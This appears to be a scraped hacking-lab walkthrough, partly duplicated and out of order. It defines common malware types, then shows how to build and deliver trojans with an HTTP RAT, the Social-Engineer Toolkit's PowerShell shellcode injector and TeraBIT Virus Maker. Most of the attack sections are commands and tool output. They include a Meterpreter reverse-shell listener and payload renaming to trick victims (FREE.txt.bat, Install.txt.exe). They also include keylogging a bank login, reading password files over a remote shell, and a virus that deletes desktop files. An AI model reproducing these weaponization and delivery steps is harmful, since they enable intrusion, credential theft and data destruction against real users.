The following are the most common types of malicious software (malware):
* Computer virus: Malicious software that infects a host file or system area to produce an undesirable outcome such as erasing data, stealing information, or corrupting the integrity of the system. In numerous cases, these viruses multiply again to form new generations of themselves.
* Worm: A virus that replicates itself over the network, infecting numerous vulnerable systems. In most cases, a worm executes malicious instructions on a remote system without user interaction.
Mailer or mass-mailer worm: A type of worm that sends itself in an email message. Examples of mass-mailer worms are Loveletter.A@mm and W32/SKA.A@m (a.k.a. the Happy99 worm), which sends a copy of itself every time the user sends a new message.
* Logic bomb: A type of malicious code that is injected into a legitimate application. An attacker can program a logic bomb to delete itself from the disk after it performs the malicious tasks on the system. Examples of these malicious tasks include deleting or corrupting files or databases
and executing a specific instruction after certain system conditions are met.
* Trojan horse: A type of malware that executes instructions to delete files, steal data, or otherwise compromise the integrity of the underlying operating system. Trojan horses typically use a form of social engineering to fool victims into installing such software on their computers or mobile devices. Trojans can also act as back doors.
* Back door: A piece of malware or a configuration change that allows an attacker to control the victim’s system remotely. For example, a back door can open a network port on the affected system so that the attacker can connect to and control the system.
* Exploit: A malicious program designed to exploit, or take advantage of, a single vulnerability or set of vulnerabilities.
* Downloader: A piece of malware that downloads and installs other malicious content from the Internet to perform additional exploitation on an affected system.
* Spammer: Malware that sends spam, or unsolicited messages sent via email, instant messaging, newsgroups, or any other kind of computer or mobile device communications. Spammers send these unsolicited messages with the primary goal of fooling users into clicking malicious links, replying to emails or other messages with sensitive information, or performing different types of scams. The attacker’s main objective is to make money.
* Key logger: A piece of malware that captures the user’s keystrokes on a compromised computer or mobile device. A key logger collects sensitive information such as passwords, personal ID numbers (PINs), personally identifiable information (PII), credit card numbers, and more.
* Rootkit: A set of tools used by an attacker to elevate his or her privilege to obtain root-level access in order to completely take control of the affected system.
* Ransomware: A type of malware that compromises a system and then demands that the victim pay a ransom to the attacker in order for the malicious activity to cease or for the malware to be removed from the affected system. Two examples of ransomware are Crypto Locker and CryptoWall; they both encrypt the victim’s data and demand that the user pay a ransom in order for the data to be decrypted and accessible again.
Click OK
Rename the httpserver file to make it more clickable and send it to the victim via email, USB or other social engineering means.
In this case I just double-click the file on my Windows 7 machine.
If you open Task Manager, you'll notice the httpserver.exe process is running in the background.
I HTTP to the Windows 7 machine (192.168.1.130) from my Windows 10 machine (192.168.1.100).
Once you've connected via HTTP, you can browse machine using the GUI menu.
You can browse files and view its contents. In this case I've created a text file and put some usernames and passwords on it.
You can also system info and users created.
Social Engineering Toolset (SET)
Rename x86_powershell_injection.txt to make it attractive such as FREE.txt.bat. Do a right-click > Rename.
Transfer the .bat file to Windows 7 machine using various Social Engineering attacks (i.e. email, USB, phishing, etc.). Open the batch file (.bat) by double-clicking on the file. Notice it shows up as a text (.txt) file.
A command prompt (with bunch of text) will appear and then quickly disappear automatically.
TeraBit Virus Maker
Download (extract) and install TeraBIT Virus Maker. Click on the Application to launch it.
Do a right-click > Properties and notice it shows as a .txt file but actually it's an .exe file
It automatically deleted my Desktop files (PASWORDS, FILE-1 and FILE-2) and also deleted the PuTTY Desktop icon.
* Computer virus: Malicious software that infects a host file or system area to produce an undesirable outcome such as erasing data, stealing information, or corrupting the integrity of the system. In numerous cases, these viruses multiply again to form new generations of themselves.
* Worm: A virus that replicates itself over the network, infecting numerous vulnerable systems. In most cases, a worm executes malicious instructions on a remote system without user interaction.
Mailer or mass-mailer worm: A type of worm that sends itself in an email message. Examples of mass-mailer worms are Loveletter.A@mm and W32/SKA.A@m (a.k.a. the Happy99 worm), which sends a copy of itself every time the user sends a new message.
* Logic bomb: A type of malicious code that is injected into a legitimate application. An attacker can program a logic bomb to delete itself from the disk after it performs the malicious tasks on the system. Examples of these malicious tasks include deleting or corrupting files or databases
and executing a specific instruction after certain system conditions are met.
* Trojan horse: A type of malware that executes instructions to delete files, steal data, or otherwise compromise the integrity of the underlying operating system. Trojan horses typically use a form of social engineering to fool victims into installing such software on their computers or mobile devices. Trojans can also act as back doors.
* Back door: A piece of malware or a configuration change that allows an attacker to control the victim’s system remotely. For example, a back door can open a network port on the affected system so that the attacker can connect to and control the system.
* Exploit: A malicious program designed to exploit, or take advantage of, a single vulnerability or set of vulnerabilities.
* Downloader: A piece of malware that downloads and installs other malicious content from the Internet to perform additional exploitation on an affected system.
* Spammer: Malware that sends spam, or unsolicited messages sent via email, instant messaging, newsgroups, or any other kind of computer or mobile device communications. Spammers send these unsolicited messages with the primary goal of fooling users into clicking malicious links, replying to emails or other messages with sensitive information, or performing different types of scams. The attacker’s main objective is to make money.
* Key logger: A piece of malware that captures the user’s keystrokes on a compromised computer or mobile device. A key logger collects sensitive information such as passwords, personal ID numbers (PINs), personally identifiable information (PII), credit card numbers, and more.
* Rootkit: A set of tools used by an attacker to elevate his or her privilege to obtain root-level access in order to completely take control of the affected system.
* Ransomware: A type of malware that compromises a system and then demands that the victim pay a ransom to the attacker in order for the malicious activity to cease or for the malware to be removed from the affected system. Two examples of ransomware are Crypto Locker and CryptoWall; they both encrypt the victim’s data and demand that the user pay a ransom in order for the data to be decrypted and accessible again.
HTTP Remote Access Trojan (RAT)
Unzip the
downloaded file > double-click on the httprat application > deselect send
notification with ip address to mail > click Create.
Click OK
Rename the httpserver file to make it more clickable and send it to the victim via email, USB or other social engineering means.
In this case I just double-click the file on my Windows 7 machine.
If you open Task Manager, you'll notice the httpserver.exe process is running in the background.
I HTTP to the Windows 7 machine (192.168.1.130) from my Windows 10 machine (192.168.1.100).
Once you've connected via HTTP, you can browse machine using the GUI menu.
You can browse files and view its contents. In this case I've created a text file and put some usernames and passwords on it.
You can also system info and users created.
Social Engineering Toolset (SET)
Launch
the Social Engineer Toolkit in Kali Linux by typing setoolkit in a terminal
> type y > type 1
root@kali:~#
setoolkit
[-] New
set.config.py file generated on: 2018-10-30 02:50:14.347100
[-]
Verifying configuration update...
[*]
Update verified, config timestamp is: 2018-10-30 02:50:14.347100
[*] SET
is using the new config, no need to restart
Copyright
2018, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All
rights reserved.
Redistribution
and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
* Redistributions of source code must
retain the above copyright notice, this list of conditions and the following
disclaimer.
* Redistributions in binary form must
reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
* Neither the name of Social-Engineer
Toolkit nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS
SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
The above
licensing was taken from the BSD licensing and is applied to Social-Engineer
Toolkit as well.
Note that
the Social-Engineer Toolkit is provided as is, and is a royalty free
open-source application.
Feel free
to modify, use, change, market, do whatever you want with it as long as you
give the appropriate credit where credit is due (which means giving the authors
the credit they deserve for writing it).
Also note
that by using this software, if you ever see the creator of SET in a bar, you
should (optional) give him a hug and should (optional) buy him a beer (or
bourbon - hopefully bourbon). Author has the option to refuse the hug (most
likely will never happen) or the beer or bourbon (also most likely will never
happen). Also by using this tool (these are all optional of course!), you
should try to make this industry better, try to stay positive, try to help
others, try to learn from one another, try stay out of drama, try offer free
hugs when possible (and make sure recipient agrees to mutual hug), and try to
do everything you can to be awesome.
The
Social-Engineer Toolkit is designed purely for good and not evil. If you are
planning on using this tool for malicious purposes that are not authorized by
the company you are performing assessments for, you are violating the terms of
service and license of this toolset. By hitting yes (only one time), you agree
to the terms of service and that you will only use this tool for lawful
purposes only.
Do you agree to the terms of service [y/n]: y
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 7.7.9
Codename: 'Blackout'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
Welcome to the Social-Engineer Toolkit
(SET).
The one stop shop for all of your SE
needs.
Join us on irc.freenode.net in channel
#setoolkit
The Social-Engineer Toolkit is a product of
TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters
Framework! (PTF)
Visit https://github.com/trustedsec/ptf
to update all your tools!
Select from the menu:
1)
Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 7.7.9
Codename: 'Blackout'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
Welcome to the Social-Engineer Toolkit
(SET).
The one stop shop for all of your SE
needs.
Join us on irc.freenode.net in channel
#setoolkit
The Social-Engineer Toolkit is a product of
TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters
Framework! (PTF)
Visit https://github.com/trustedsec/ptf
to update all your tools!
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9)
Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 9
The
Powershell Attack Vector module allows you to create PowerShell specific
attacks. These attacks will allow you to use PowerShell which is available by
default in all operating systems Windows Vista and above. PowerShell provides a
fruitful landscape for deploying
payloads and performing functions that
do not get triggered by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>1
Enter the IPAddress or DNS name for the reverse
host: 192.168.1.110 // KALI LINUX
set:powershell>
Enter the port for the reverse [443]:
[*]
Prepping the payload for delivery and injecting alphanumeric shellcode...
[*]
Generating x86-based powershell injection code...
[*]
Reverse_HTTPS takes a few seconds to calculate..One moment..
No
encoder or badchars specified, outputting raw payload
Payload
size: 381 bytes
Final
size of c file: 1626 bytes
[*]
Finished generating powershell injection bypass.
[*]
Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack,
they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now
[yes/no]: : yes
[-]
Failed to connect to the database: could not connect to server: Connection
refused
Is the server running on host
"localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not
connect to server: Connection refused
Is the server running on host
"localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
#
cowsay++
____________
<
metasploit >
------------
\
,__,
\
(oo)____
(__) )\
||--|| *
=[ metasploit v4.17.11-dev ]
+ -- --=[
1807 exploits - 1028 auxiliary - 313 post
]
+ -- --=[
539 payloads - 42 encoders - 10 nops
]
+ -- --=[
Free Metasploit Pro trial: http://r-7.co/trymsp
]
[*]
Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource
(/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource
(/root/.set/reports/powershell/powershell.rc)> set payload
windows/meterpreter/reverse_https
payload
=> windows/meterpreter/reverse_https
resource
(/root/.set/reports/powershell/powershell.rc)> set LPORT 443
LPORT
=> 443
resource
(/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST
=> 0.0.0.0
resource
(/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false
ExitOnSession
=> false
resource
(/root/.set/reports/powershell/powershell.rc)> exploit -j
[*]
Exploit running as background job 0.
msf
exploit(multi/handler) >
[*]
Started HTTPS reverse handler on https://0.0.0.0:443
msf
exploit(multi/handler) >
The
.set is a hidden folder, so to unhide it, go to Kali Linux (GUI) > click Toggle
view > tick Show hidden files
Rename x86_powershell_injection.txt to make it attractive such as FREE.txt.bat. Do a right-click > Rename.
Transfer the .bat file to Windows 7 machine using various Social Engineering attacks (i.e. email, USB, phishing, etc.). Open the batch file (.bat) by double-clicking on the file. Notice it shows up as a text (.txt) file.
A command prompt (with bunch of text) will appear and then quickly disappear automatically.
Notice a session was established and detected in Kali SET.
msf
exploit(multi/handler) >
[*] https://0.0.0.0:443 handling request from
192.168.1.130; (UUID: etbgjsne) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.110:443
-> 192.168.1.130:52426) at 2018-10-30 03:24:30 -0400
msf
exploit(multi/handler) > show sessions
Active
sessions
===============
Id
Name Type Information
Connection
--
---- ---- -----------
----------
1
meterpreter x86/windows
WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ 192.168.1.110:443 -> 192.168.1.130:52458
(192.168.1.130)
msf
exploit(multi/handler) > sessions 1
[*]
Starting interaction with 1...
meterpreter
> help
Core
Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background
meterpreter script
bglist Lists running background
scripts
bgrun Executes a meterpreter
script as a background thread
channel Displays information or
control active channels
close Closes a channel
detach Detach the meterpreter
session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter
session
get_timeouts Get the current session timeout
values
guid Get the session GUID
help Help menu
info Displays information
about a Post module
irb Drop into irb scripting
mode
load Load one or more
meterpreter extensions
machine_id Get the MSF ID of the machine
attached to the session
migrate Migrate the server to
another process
pivot Manage pivot listeners
quit Terminate the meterpreter
session
read Reads data from a channel
resource Run the commands stored in a
file
run Executes a meterpreter
script or Post module
sessions Quickly switch to another
session
set_timeouts Set the current session timeout
values
sleep Force Meterpreter to go
quiet, then re-establish session.
ssl_verify Modify the SSL certificate
verification setting
transport Change the current transport
mechanism
use Deprecated alias for
"load"
uuid Get the UUID for the
current session
write Writes data to a channel
Stdapi:
File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the
screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi:
Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the
target
route View and modify the routing table
Stdapi:
System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation
token.
execute Execute a command
getenv Get one or more environment variable
values
getpid Get the current process identifier
getprivs Attempt to enable all privileges
available to the current process
getsid Get the SID of the user that the server
is running as
getuid Get the user that the server is running
as
kill Terminate a process
localtime Displays the target system's local date
and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote
registry
rev2self Calls RevertToSelf() on the remote
machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token
from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote
system, such as OS
Stdapi:
User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window
stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote
user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive
desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface
components
Stdapi:
Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone
for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi:
Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system,
nothing written on disk
Priv:
Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that
of local system.
Priv:
Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv:
Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter
> sysinfo
Computer : WIN-7V0EVV4BKQJ
OS : Windows 7 (Build 7601, Service
Pack 1).
Architecture : x86
System
Language : en_US
Domain : WORKGROUP
Logged On
Users : 1
Meterpreter : x86/windows
meterpreter
> arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
192.168.1.1 00:78:88:4b:bf:65 11
192.168.1.100 c0:3f:d5:6b:62:41 11
192.168.1.110 00:0c:29:6a:10:05 11
192.168.1.255 ff:ff:ff:ff:ff:ff 11
224.0.0.22 00:00:00:00:00:00 1
224.0.0.22 01:00:5e:00:00:16 11
224.0.0.251 01:00:5e:00:00:fb 11
224.0.0.252 01:00:5e:00:00:fc 11
239.255.255.250 00:00:00:00:00:00 1
239.255.255.250 01:00:5e:7f:ff:fa 11
meterpreter
> ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware
MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4
Address : 127.0.0.1
IPv4
Netmask : 255.0.0.0
IPv6
Address : ::1
IPv6
Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface
11
============
Name : Intel(R) PRO/1000 MT Network
Connection
Hardware
MAC : 00:0c:29:6b:99:7a
MTU : 1500
IPv4
Address : 192.168.1.130
IPv4
Netmask : 255.255.255.0
IPv6
Address : fe80::104a:e373:9974:3524
IPv6
Netmask : ffff:ffff:ffff:ffff::
Interface
12
============
Name : Microsoft ISATAP Adapter
Hardware
MAC : 00:00:00:00:00:00
MTU : 1280
IPv6
Address : fe80::5efe:c0a8:182
IPv6
Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
You can perform a key scan or key logger. In this case I went to www.bankofamerica and login (dummy account).
meterpreter
> keyscan_start
Starting
the keystroke sniffer ...
meterpreter
> keyscan_dump
Dumping
captured keystrokes...
bankofamerica.com<CR>
john<Tab>abcxyz123
You can issue shell commands and perform reconnaissance on the infected machine.
meterpreter
> shell
Process
2676 created.
Channel 1
created.
Microsoft
Windows [Version 6.1.7601]
Copyright
(c) 2009 Microsoft Corporation. All
rights reserved.
C:\Users\Administrator\Downloads\TROJAN\FREE.txt>cd C:\Users\Administrator\Documents
cd
C:\Users\Administrator\Documents
C:\Users\Administrator\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8A57-80AD
Directory of C:\Users\Administrator\Documents
10/30/2018 02:45 PM
<DIR> .
10/30/2018 02:45 PM
<DIR> ..
10/17/2018 05:32 PM 44 PASSWORDS.txt
10/30/2018 02:45 PM
<DIR> WIN7
1 File(s) 44 bytes
3 Dir(s) 55,791,808,512 bytes free
C:\Users\Administrator\Documents>more PASSWORDS.txt
more
PASSWORDS.txt
cisco
cisco123
admin cisco
admin admin
TeraBit Virus Maker
Download (extract) and install TeraBIT Virus Maker. Click on the Application to launch it.
I created a virus that would maliciously perform the following:
- Delete All Files in Desktop
- Funny Start Button
- Hide Desktop Icons
I also
created a custom Error Message (This PC is hackced!) and changed the file icon to appear as MS
Word document with a filename of Install.txt.exe.
Click
Create Virus and choose a location to save the virus file.
Do a right-click > Properties and notice it shows as a .txt file but actually it's an .exe file
Transfer the virus file using various Social Engineering attack (hyperlink, phishing, etc.). Double-click
on the virus file (Install.txt). Notice it launched the custom error message.
It automatically deleted my Desktop files (PASWORDS, FILE-1 and FILE-2) and also deleted the PuTTY Desktop icon.
